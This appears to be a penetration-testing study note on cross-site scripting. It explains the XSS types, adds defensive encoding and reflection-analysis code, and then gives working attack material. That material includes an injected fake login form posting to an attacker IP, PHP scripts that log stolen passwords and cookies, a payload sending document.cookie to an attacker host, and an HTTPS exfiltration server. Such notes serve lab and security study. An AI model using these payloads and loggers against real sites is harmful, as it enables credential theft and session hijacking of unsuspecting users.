XSS
Cross-Site Scripting
When a web application renders user-supplied input into the page (whether the HTML comes from the back end or is built on the client side) without properly sanitizing or encoding it, an attacker can inject JavaScript through input fields, URL parameters or headers, and that script runs in the browser of every user who views the affected page.
XSS Types
Stored XSS is persistent: the payload is saved on the server and affects every user who visits the page.
Non-persistent XSS is not stored on the server and only fires for the request that carries it. Reflected XSS is processed by the server and echoed back in the response; DOM-based XSS is handled entirely on the client side and never reaches the back-end server.
Stored XSS
Most critical: user input is stored in the back-end database and served to every user who views the page, so a single injection hits all visitors.
Reflected XSS
Occurs when user input (e.g. a URL parameter or form field) is processed by the back-end server and echoed into the response; the victim has to be lured into sending the crafted request, typically via a link.
DOM XSS
Occurs when user input is written into the page entirely by client-side JavaScript (for example from location.hash or a URL parameter into innerHTML or document.write); the payload is never sent to the server, so server-side filters and logs do not see it.
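The reflected and stored cases in code, as an added example that is not part of the original page: a search page and a comment list rendered first by string concatenation and then with HTML encoding of every untrusted value. All function names, the payloads and the in-memory comment list are constructed for this illustration.

```javascript
// Added example (not from the original page): a minimal server-side template for a
// search page and a comment list, each rendered first by string concatenation
// (reflected / stored XSS) and then with HTML encoding of every untrusted value.
// All function names, payloads and the in-memory comment list are constructed for
// this illustration.

// Encode the characters that can change HTML structure. Covering both quote styles
// makes the output safe in the body and inside single- or double-quoted attributes.
function htmlEncode(str) {
  return String(str)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Reflected XSS: the search term is echoed into the body and into an attribute as-is.
function renderSearchUnsafe(q) {
  return `<h3>Results for: ${q}</h3>\n<input name="q" value="${q}">`;
}

// Same page, with the untrusted value encoded for the HTML contexts it lands in.
function renderSearchSafe(q) {
  const enc = htmlEncode(q);
  return `<h3>Results for: ${enc}</h3>\n<input name="q" value="${enc}">`;
}

// Stored XSS: comments persisted verbatim are replayed to every visitor.
function renderCommentsUnsafe(comments) {
  return comments.map((c) => `<li>${c}</li>`).join("\n");
}
function renderCommentsSafe(comments) {
  return comments.map((c) => `<li>${htmlEncode(c)}</li>`).join("\n");
}

// List the element names actually present in the rendered HTML. Untrusted data
// must never add elements the template did not put there.
function tagNames(html) {
  return Array.from(html.matchAll(/<([a-z][a-z0-9]*)\b[^>]*>/gi), (m) => m[1].toLowerCase());
}

// Constructed payloads in the same style as the ones used later on this page.
const attrBreakout = '"><script>alert(1)</script><!--'; // breaks out of value="..."
const bodyPayload = '<img src=x onerror="alert(document.cookie)">'; // no <script> needed

console.log(tagNames(renderSearchUnsafe(attrBreakout))); // ["h3","script","input","script"]
console.log(tagNames(renderSearchSafe(attrBreakout)));   // ["h3","input"]
const stored = [bodyPayload, "nice post"];               // constructed comment store
console.log(tagNames(renderCommentsUnsafe(stored)));     // ["li","img","li"]
console.log(tagNames(renderCommentsSafe(stored)));       // ["li","li"]
```

The check is deliberately structural: whatever the payload looks like, the encoded render never contains an element the template did not emit, while the unencoded render gains a script or img element from the user data.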
XSS Discovery
Automated scanners such as Nessus, Nikto, Burp Suite and ZAP can flag XSS, as can open-source XSS-specific tools:
XSStrike
BruteXSS
XSSer
Manually test by placing XSS payloads into input elements and HTTP headers (User-Agent, Referer, Cookie, etc.) and checking whether they come back unencoded in the response: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md
Code review: understand how input is handled (where it is reflected and what filtering or encoding applies) in order to write custom payloads.
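A more systematic version of the manual test, as an added example that is not from the original page or any of the tools listed: submit one canary followed by the characters a payload needs, then read the response to learn whether it is reflected, which characters came back raw, encoded or stripped, and what HTML context the reflection sits in, since the context decides the payload shape. The sample responses are hand constructed (in practice the body would come from an HTTP request), and the canary, function names and payload suggestions are this example's own choices.

```javascript
// Added example (not from the original page): a helper for the manual discovery step.
// Inject one canary followed by the characters a payload needs, then read the response
// to learn (a) whether it is reflected, (b) which characters came back raw, encoded or
// stripped, and (c) the HTML context of the reflection. Sample responses are hand
// constructed; canary, names and payload suggestions are this example's own choices.

const CANARY = "zq7k3v";                          // unlikely to occur naturally
const PROBE_CHARS = ['"', "'", "<", ">", "/", "&"];
const PROBE = CANARY + PROBE_CHARS.join("");      // value to submit: zq7k3v"'<>/&

// Encoded forms a server might substitute for each probe character (lowercase).
const ENCODINGS = {
  '"': ["&quot;", "&#34;", "&#x22;", '\\"'],
  "'": ["&#39;", "&#x27;", "&apos;", "\\'"],
  "<": ["&lt;", "&#60;", "&#x3c;"],
  ">": ["&gt;", "&#62;", "&#x3e;"],
  "/": ["&#47;", "&#x2f;", "\\/"],
  "&": ["&amp;", "&#38;", "&#x26;"],
};

// Classify where in the markup a given offset sits.
function contextAt(body, idx) {
  const before = body.slice(0, idx).toLowerCase();
  if (before.lastIndexOf("<script") > before.lastIndexOf("</script")) return "script";
  if (before.lastIndexOf("<!--") > before.lastIndexOf("-->")) return "comment";
  const lastLt = before.lastIndexOf("<");
  if (lastLt > before.lastIndexOf(">")) {            // inside a tag
    const tag = before.slice(lastLt);
    if ((tag.match(/"/g) || []).length % 2 === 1) return "attribute (double-quoted)";
    if ((tag.match(/'/g) || []).length % 2 === 1) return "attribute (single-quoted)";
    return "tag";
  }
  return "html body";
}

// Walk each reflection of the canary and record the fate of every probe character.
function analyzeReflection(body, canary = CANARY) {
  const lower = body.toLowerCase();
  const findings = [];
  for (let idx = lower.indexOf(canary); idx !== -1; idx = lower.indexOf(canary, idx + 1)) {
    let pos = idx + canary.length;
    const survived = [], encoded = [], stripped = [];
    for (const ch of PROBE_CHARS) {
      // Check encoded forms first: a raw "&" would otherwise match the start of "&amp;".
      const enc = ENCODINGS[ch].find((e) => lower.startsWith(e, pos));
      if (enc) { encoded.push(ch); pos += enc.length; continue; }
      if (lower.startsWith(ch, pos)) { survived.push(ch); pos += 1; continue; }
      stripped.push(ch);                              // neither raw nor encoded: removed
    }
    findings.push({ offset: idx, context: contextAt(body, idx), survived, encoded, stripped });
  }
  return findings;
}

// Map a finding to the payload family worth trying next (null: no obvious vector).
function suggestPayload(f) {
  const has = (c) => f.survived.includes(c);
  if (f.context === "script") {
    if (has("<") && has("/") && has(">")) return "</script><script>alert(1)</script>";
    return has('"') ? '";alert(1);//' : null;
  }
  if (f.context.startsWith("attribute")) {
    const q = f.context.includes("double") ? '"' : "'";
    if (!has(q)) return null;
    return has("<") && has(">") ? q + "><script>alert(1)</script>"
                                : q + " autofocus onfocus=alert(1) x=" + q;
  }
  return f.context === "html body" && has("<") && has(">") ? "<img src=x onerror=alert(1)>" : null;
}

// Constructed sample responses, as if PROBE had been submitted to four different apps.
const SAMPLE_RESPONSES = {
  attrRaw: `<input name="q" value="${PROBE}">`,                       // nothing encoded
  bodyEncoded: `<p>You searched for: zq7k3v&quot;&#39;&lt;&gt;/&amp;</p>`,
  scriptPartial: `<script>var q = "zq7k3v\\"'<>/&";</script>`,       // only " escaped
  bodyStripped: `<div>zq7k3v"'/&</div>`,                              // < and > removed
  none: `<div>no results</div>`,
};

for (const [name, body] of Object.entries(SAMPLE_RESPONSES)) {
  for (const f of analyzeReflection(body)) {
    console.log(name, f.context, "raw:", f.survived.join(""), "next:", suggestPayload(f));
  }
}
```

The script case is the one worth remembering: escaping the double quote inside a JavaScript string is not enough when the raw </script> sequence survives, because the HTML parser closes the script block before the JavaScript parser ever sees the string.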
XSS Attacks
Defacing: injected JavaScript can change the look and feel of the website (background, title, text); with stored XSS the change is shown to every visitor.
Phishing attack
# Create Login page
<h3>Please login to continue</h3>
<form action=http://OUR_IP>
<input type="username" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="submit" value="Login">
</form>
Payload
'><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.24:8888><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
Simple PHP script (hosted at OUR_IP; appends the submitted credentials to creds.txt, then redirects the victim to the real page so nothing looks wrong)
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
$file = fopen("creds.txt", "a+");
fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
header("Location: http://SERVER_IP/phishing/index.php");
fclose($file);
exit();
}
?>
Session Hijacking
It's possible to use JavaScript to collect the victim's cookies and send them to a server we control, then use them to log in as the victim. Note that cookies flagged HttpOnly are not exposed through document.cookie, so this only captures cookies the application left readable from JavaScript.
Sometimes we can't see how our input is handled (Blind XSS, e.g. input that is only rendered in an admin panel). We can still detect execution by having the payload make an HTTP request back to a server we control and watching the listener.
# Write this line to script.js
new Image().src='http://PWNIP:PWNPO/index.php?c='+document.cookie;
# Host index.php
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
# Start listener
php -S 0.0.0.0:8080
# Execute payload
"><script src=http://PWNIP:PWNPO/script.js></script>
HTTPS Exfiltration
Modern browsers block mixed content: a page served over HTTPS will not load resources (images, scripts) from plain http:// URLs, so a payload injected into an HTTPS site must exfiltrate to an HTTPS listener. A quick option is a Python HTTPS server with a self-signed certificate. Caveat: browsers silently drop subresource requests to hosts whose certificate they do not trust, so a self-signed certificate only works where the victim's browser has been made to trust it; for a real engagement use a certificate from a trusted CA on a domain you control.
# Create certificate
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# Python server (legacy: ssl.wrap_socket was deprecated in Python 3.7 and removed in 3.12)
from http import server
import ssl
httpd = server.HTTPServer(('0.0.0.0', 4443), server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
# Python server (current: use an SSLContext)
from http import server
import ssl
httpd = server.HTTPServer(('0.0.0.0', 4443), server.SimpleHTTPRequestHandler)
# Create SSL context
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile='./server.pem')
# Wrap socket with the context
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()